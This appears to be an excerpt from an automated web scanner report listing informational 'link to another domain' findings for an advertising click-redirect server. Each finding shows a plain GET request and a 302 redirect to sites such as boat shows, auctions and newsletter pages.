The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:39:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:08:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

Response

20.273. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
